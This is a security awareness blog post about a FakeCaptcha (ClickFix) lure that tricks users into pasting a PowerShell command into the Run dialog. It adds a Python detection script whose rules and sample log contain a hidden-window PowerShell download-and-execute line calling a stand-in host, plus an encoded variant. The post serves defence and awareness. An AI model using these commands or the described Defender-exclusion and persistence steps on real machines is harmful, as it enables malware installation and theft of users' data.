
A Weekend Encounter with a FakeCaptcha Attack
This weekend I chanced upon a website attempting a FakeCaptcha attack. Upon clicking the link, I was prompted with a CAPTCHA verification—seemingly normal, right? But after clicking the “I am not a robot” checkbox, a pop-up appeared with an unusual message:
“Could not connect to the reCAPTCHA. To better prove you are not a robot, please: 1. Press & hold the Windows key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish.”
Something felt off, and rightly so. On closer inspection, I realised that clicking the checkbox had copied a PowerShell command to my clipboard:
How FakeCaptcha tries to infect your system
The moment I clicked the checkbox, the page's script silently wrote a PowerShell command to the clipboard. The on-screen instructions then do the rest: Windows key + R opens the Run dialog, Ctrl + V pastes the command, and Enter runs it. No browser vulnerability is exploited; the victim launches the downloader themselves, under their own Windows account. The command was built to fetch and execute a malicious JavaScript file through PowerShell, and to do so silently, without any window or alert appearing on screen.
What does this malicious script do?
Upon further investigation, I realised that the system_t.js script was designed to execute the following:
Bypass Security Restrictions – It changes the PowerShell execution policy so that scripts run without prompts. Note that the execution policy is a safety setting, not a security boundary: a single -ExecutionPolicy Bypass switch on the command line defeats it, which is why the pasted command can run at all.
Download Additional Malware – It builds URLs to fetch further JavaScript code and a ZIP file containing the actual payloads.
Communicate with a Command & Control (C2) Server – It sends a request to a remote server, most likely to register the infection or to receive further instructions.
Disable Windows Defender – If it happens to run with administrator privileges, it adds Windows Defender exclusions so that the dropped files are not scanned.
Extract and Execute the Payload – The ZIP file is extracted and its contents are run through wscript.exe (the Windows Script Host), potentially launching ransomware or spyware.
Ensure Persistence – It writes a Windows Registry run entry so that it is launched again at every startup, which makes it survive a reboot and harder to remove.
Delete Evidence – After execution the ZIP file is deleted to cover its tracks.
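The chain described above, from the command pasted into Win+R down to the Run-key entry, leaves a recognisable trail on the host, and that trail is what behaviour-based detection catches even when the script's file hash is brand new. The following Python is added here as an example and is not code from the original post or from the malware: it scores Sysmon-style process-creation (EventID 1) and registry-set (EventID 13) records against the behaviours listed above. The command pasted into the Run dialog is recorded under the RunMRU registry key and spawns powershell.exe as a child of explorer.exe; the command line carries hidden-window, execution-policy-bypass and download-and-execute switches (the script also unpacks a -EncodedCommand payload so those switches cannot hide behind base64); then Defender exclusions, wscript.exe running under %TEMP% and a Run-key value follow. The event dictionaries, the hostname captcha-check.example, the user name and file paths are constructed for this example.

```python
"""Behavioural triage for a FakeCaptcha / ClickFix infection chain (added example).

Event shapes, paths, the hostname captcha-check.example and the sample
log below are constructed for this example, not taken from a real host.
"""
import base64
import re

# rule name -> pattern applied case-insensitively to a command line
COMMAND_RULES = [
    ("hidden-window", r"-w(?:indowstyle)?\s+h(?:idden)?\b"),
    ("execution-policy-bypass", r"-(?:ep|executionpolicy)\s+bypass\b|Set-ExecutionPolicy"),
    ("remote-download", r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\birm\b|Net\.WebClient"),
    ("in-memory-exec", r"\biex\b|Invoke-Expression"),
    ("defender-exclusion", r"Add-MpPreference|Set-MpPreference"),
    ("wscript-from-temp", r"wscript(?:\.exe)?[^|]*\\(?:Temp|AppData)\\"),
    ("archive-extract", r"Expand-Archive|Shell\.Application"),
]
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
CHAIN = {"run-dialog-history", "interpreter-spawned-by-explorer"}  # the Win+R part of the attack
PAYLOAD = {"hidden-window", "execution-policy-bypass", "remote-download", "in-memory-exec"}


def expand_encoded_command(cmdline):
    """Append the decoded text of a -EncodedCommand (base64 of UTF-16LE) so the rules see it."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def classify_command(cmdline):
    """Names of the rules a command line triggers, in COMMAND_RULES order."""
    text = expand_encoded_command(cmdline)
    return [name for name, pat in COMMAND_RULES if re.search(pat, text, re.I)]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (index, subject, hits) for every event that shows at least one indicator."""
    findings = []
    for i, ev in enumerate(events):
        if ev["id"] == 1:  # process creation
            hits = classify_command(ev["cmdline"])
            # Win+R starts the interpreter as a child of explorer.exe; flag that only when the
            # command line itself looks bad, so a console the user opened is not reported.
            if hits and _basename(ev["parent"]) == "explorer.exe" and _basename(ev["image"]) in INTERPRETERS:
                hits.insert(0, "interpreter-spawned-by-explorer")
            subject = ev["cmdline"]
        else:  # registry value set
            key, hits = ev["target"].lower(), []
            if "\\explorer\\runmru\\" in key:
                hits.append("run-dialog-history")  # the Run dialog keeps the pasted text here
            elif "\\currentversion\\run\\" in key:
                hits.append("run-key-persistence")
            elif "\\windows defender\\exclusions\\" in key:
                hits.append("defender-exclusion")
            hits += classify_command(ev.get("details", ""))
            subject = ev["target"]
        if hits:
            findings.append((i, subject, hits))
    return findings


def verdict(findings):
    tags = {h for _, _, hits in findings for h in hits}
    if tags & CHAIN and len(tags & PAYLOAD) >= 2:
        return "likely FakeCaptcha/ClickFix chain"
    if tags & PAYLOAD:
        return "suspicious PowerShell download"
    return "no ClickFix indicators"


# --- constructed sample log: hostname, user and paths are made up for this example ---
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PASTED = (r"powershell -w hidden -ep bypass -c iex ((New-Object Net.WebClient)"
          r".DownloadString('http://captcha-check.example/system_t.js'))")
ENCODED_COMMAND = "powershell -nop -w hidden -enc " + base64.b64encode(
    "IEX (iwr 'http://captcha-check.example/system_t.js')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 13, "image": r"C:\Windows\explorer.exe", "details": PASTED + r"\1",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a"},
    {"id": 1, "image": PS, "parent": r"C:\Windows\explorer.exe", "cmdline": PASTED},
    {"id": 13, "image": PS, "details": "DWORD (0x00000000)",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\alice\AppData\Local\Temp"},
    {"id": 1, "image": r"C:\Windows\System32\wscript.exe", "parent": PS,
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\pkg\start.js"'},
    {"id": 13, "image": r"C:\Windows\System32\wscript.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"wscript.exe C:\Users\alice\AppData\Local\Temp\pkg\start.js"},
    {"id": 1, "image": PS, "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe"},  # benign console
]

if __name__ == "__main__":
    for idx, subject, hits in triage(SAMPLE_EVENTS):
        print(f"[{idx}] {', '.join(hits)}\n     {subject[:90]}")
    print("verdict:", verdict(triage(SAMPLE_EVENTS)))
```

To run this against a real Sysmon export, map EventID 1 fields (Image, ParentImage, CommandLine) and EventID 13 fields (TargetObject, Details) onto the dictionaries. The RunMRU write and the explorer.exe parent are the signals specific to this social-engineering pattern; the command-line rules on their own would also fire on any hand-typed download cradle, which is why the verdict requires both.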
What malware is typically used in these attacks?
According to Avast, FakeCaptcha scams often deploy Lumma Stealer, an information-stealing malware that targets:
✅ Passwords
✅ Financial data
✅ Personal information
Why is FakeCaptcha dangerous?
CAPTCHAs are everywhere, and we generally trust them. Cybercriminals now exploit that trust, using FakeCaptcha pages to manipulate users into running harmful scripts themselves.
Interestingly, only 3 out of 61 security vendors on VirusTotal detected this malicious script at the time, highlighting how easily a freshly built script slips past signature-based scanning, and why the behaviour described above is the better thing to look for.
Avast security experts also observed a significant rise in FakeCaptcha campaigns in Q3 2024, with the attackers increasingly depending on such deceptive tactics to distribute malware.

Protecting yourself from FakeCaptcha scams
The good news is that a few simple precautions go a long way:
✔ Question the Unusual – If a CAPTCHA appears on a site that normally would not have one, or it asks you to run commands or scripts, stop immediately.
✔ Never follow manual instructions – A legitimate CAPTCHA will never ask you to press Windows key + R, or to copy and paste anything into your system. If one does, it is a major red flag. If you have already pasted and run such a command, treat the machine as compromised; the pasted text is still visible in the Run dialog's history (press Windows key + R and open the drop-down), which is a quick way to confirm what actually ran.
✔ Use Updated Security Software – An up-to-date antivirus or endpoint product can block a known script before it runs, although a fresh sample may not be recognised at first, as the VirusTotal result shows; products that watch PowerShell behaviour rather than file signatures fare better here.
✔ Stay Informed – Understanding how these scams work helps you recognise the red flags before falling victim.
Being Cyber-Aware is the key!
FakeCaptcha attacks are a serious cybersecurity threat, and awareness is our best defence. Cybercriminals are becoming more sophisticated, using social engineering to trick unsuspecting users. By staying vigilant and following basic security practices, we can avoid falling victim to these scams.
With cybercriminals evolving their tactics, cybersecurity awareness is more important than ever. Next time you see a CAPTCHA request, think twice before clicking. It just might not be what it seems.